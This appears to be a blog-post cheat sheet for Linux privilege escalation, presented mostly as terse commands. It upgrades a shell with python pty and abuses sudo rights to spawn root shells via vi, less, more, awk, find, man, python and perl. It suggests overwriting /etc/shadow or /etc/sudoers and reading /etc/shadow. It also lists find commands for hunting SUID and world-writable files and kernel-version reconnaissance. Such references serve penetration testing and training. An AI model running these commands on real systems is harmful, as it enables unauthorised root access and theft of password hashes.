First of all upgrade to TTY
- Python TTY: python -c 'import pty; pty.spawn("/bin/sh")'
- Press 'Ctrl+Z'
- type 'stty raw -echo'
- type 'fg' and hit enter
Abusing SUDO rights
sudo -l
| nmap |
|
| vim/vi |
sudo vi
:shell
:set shell=/bin/bash:shell
:!bash
|
| less |
sudo less /etc/shadow
v
:shell
|
| more |
sudo more /home/pelle/myfile
!/bin/bash
|
| awk |
awk 'BEGIN {system("/bin/bash")}'
|
| nano |
|
| cp |
overwrite /etc/shadow or /etc/sudoers
|
| mv |
Overwrite /etc/shadow or /etc/sudoers
|
| find |
sudo find / -exec bash -i \;
|
|
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
|
| man |
sudo man man
!sh and press enter
|
| nc | |
| python |
sudo python
import os
os.system("/bin/bash")
|
| perl | sudo perl
exec "/bin/bash";
ctr-d |
SUID misconfigurations:
| #Find SUID | |
|
find / -perm -u=s -type f 2>/dev/null
|
| #Find GUID | |
|
find / -perm -g=s -type f 2>/dev/null
|
If you find any commands from the above list with SUID misconfiguration. you can use the given command to try to escalate privilege.
World Writable Scripts invoked as root:
#World writable files directories
| |
|
find / -writable -type d 2>/dev/null
|
|
find / -perm -222 -type d 2>/dev/null
|
|
find / -perm -o w -type d 2>/dev/null
|
# World executable folder
| |
|
find / -perm -o x -type d 2>/dev/null
|
# World writable and executable folders
| |
|
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
|
find / -perm -2 ! -type l -ls 2>/dev/null
| |
Programs running as root:
ps aux | grep root
Kernal Exploits:
uname -a
cat /etc/issue
cat /proc/version
References:
No comments:
Post a Comment